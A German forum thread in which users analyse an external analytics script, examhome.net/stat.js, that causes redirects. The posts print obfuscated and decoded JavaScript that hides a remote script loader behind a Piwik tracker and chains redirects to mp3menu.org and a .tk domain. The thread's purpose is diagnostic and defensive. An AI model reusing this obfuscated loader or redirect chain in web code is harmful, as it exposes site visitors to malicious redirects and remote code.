Komische Umleitung durch externes Javascript

lookshe

Member of Honour
#1
Seit einigen Tagen passiert hier komisches durch folgendes Javascript:
https://examhome.net/stat.js?v=1.0.3

Code:
eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 95, 112, 97, 113, 32, 61, 32, 95, 112, 97, 113, 32, 124, 124, 32, 91, 93, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 116, 114, 97, 99, 107, 80, 97, 103, 101, 86, 105, 101, 119, 39, 93, 41, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 101, 110, 97, 98, 108, 101, 76, 105, 110, 107, 84, 114, 97, 99, 107, 105, 110, 103, 39, 93, 41, 59, 10, 32, 32, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 117, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 105, 110, 110, 111, 99, 114, 97, 102, 116, 46, 99, 108, 111, 117, 100, 47, 34, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 84, 114, 97, 99, 107, 101, 114, 85, 114, 108, 39, 44, 32, 117, 43, 39, 112, 105, 119, 105, 107, 46, 112, 104, 112, 39, 93, 41, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 83, 105, 116, 101, 73, 100, 39, 44, 32, 39, 49, 39, 93, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 44, 32, 103, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 44, 32, 115, 61, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 103, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 103, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 32, 103, 46, 100, 101, 102, 101, 114, 61, 116, 114, 117, 101, 59, 32, 103, 46, 115, 114, 99, 61, 117, 43, 39, 112, 105, 119, 105, 107, 46, 106, 115, 39, 59, 32, 115, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 103, 44, 115, 41, 59, 10, 32, 32, 125, 41, 40, 41, 59, 10)); var mrGFvAlG = String.fromCharCode(118, 97, 114, 32, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 41, 59); eval(mrGFvAlG);
Das ganze wird zu:

Code:
eval(
"   var _paq = _paq || [];
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u=\"https://examhome.innocraft.cloud/\";
    _paq.push(['setTrackerUrl', u+'piwik.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
  })();
");
var mrGFvAlG = "var simplelement = document.createElement('script'); 
simplelement.type = 'text/javascript'; 
simplelement.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 109, 112, 51, 46, 106, 115); // "https://mp3menu.org/mp3.js"
simplelement.async = true; 
document.getElementsByTagName(\"head\")[0].appendChild(simplelement);";
eval(mrGFvAlG);
Dann gibt es eine kleine Umleitungsorgie zu irgendwelchen dubiosen Seiten.
 

Chromatin

Moderator
Mitarbeiter
#2
Der erste Teil sieht ja koscher aus. Aber der URL im 2. eval (eval(mrGFvAlG)) lässt hier die Virenscanner aktiv werden.Hast du den JS code der da geladen werden soll?eval ist aber schon fies im allgemeinen ;)
 

lookshe

Member of Honour
#3
Code:
eval(String.fromCharCode(40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 109, 112, 51, 109, 101, 110, 117, 61, 34, 41, 32, 62, 61, 32, 48, 41, 32, 123, 10, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 32, 61, 32, 110, 101, 119, 32, 68, 97, 116, 101, 40, 41, 59, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 46, 115, 101, 116, 84, 105, 109, 101, 40, 101, 120, 112, 105, 114, 121, 46, 103, 101, 116, 84, 105, 109, 101, 40, 41, 43, 40, 49, 48, 42, 54, 48, 42, 49, 48, 48, 48, 42, 54, 42, 56, 41, 41, 59, 10, 9, 9, 9, 32, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 32, 61, 32, 34, 109, 112, 51, 109, 101, 110, 117, 61, 121, 101, 115, 59, 32, 101, 120, 112, 105, 114, 101, 115, 61, 34, 32, 43, 32, 101, 120, 112, 105, 114, 121, 46, 116, 111, 71, 77, 84, 83, 116, 114, 105, 110, 103, 40, 41, 59, 10, 9, 9, 9, 32, 32, 118, 97, 114, 32, 109, 112, 51, 109, 101, 110, 117, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 109, 112, 51, 109, 101, 110, 117, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 32, 61, 32, 109, 112, 51, 109, 101, 110, 117, 59, 10, 9, 9, 9, 125, 10, 32, 32, 125, 41, 40, 41, 59));
bzw
Code:
(function() {
			if (document.cookie.indexOf(\"mp3menu=\") >= 0) {

			} else {
			  expiry = new Date();
			  expiry.setTime(expiry.getTime()+(10*60*1000*6*8));
			  document.cookie = \"mp3menu=yes; expires=\" + expiry.toGMTString();
			  var mp3menu = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 114, 101, 100, 46, 112, 104, 112); // "https://mp3menu.org/red.php"
			  window.location.replace(mp3menu);
			  window.location.href = mp3menu;
			}
  })();
Auf der Seite gibt es dann im Header ein Javascript, was die nächsten komischen Weiterleitungen anstößt:
Code:
<script>window.location.replace("http://ygetygsdfertase.tk/index/?4831537102803");window.location.href = "http://ygetygsdfertase.tk/index/?4831537102803";</script>
Wobei ich allein schon den Aufruf von https://mp3menu.org/red.php über den Weg sehr fragwürdig finde und denke, dass, was auch immer das hier einbindet, sofort entfernt werden sollte.
 
Oben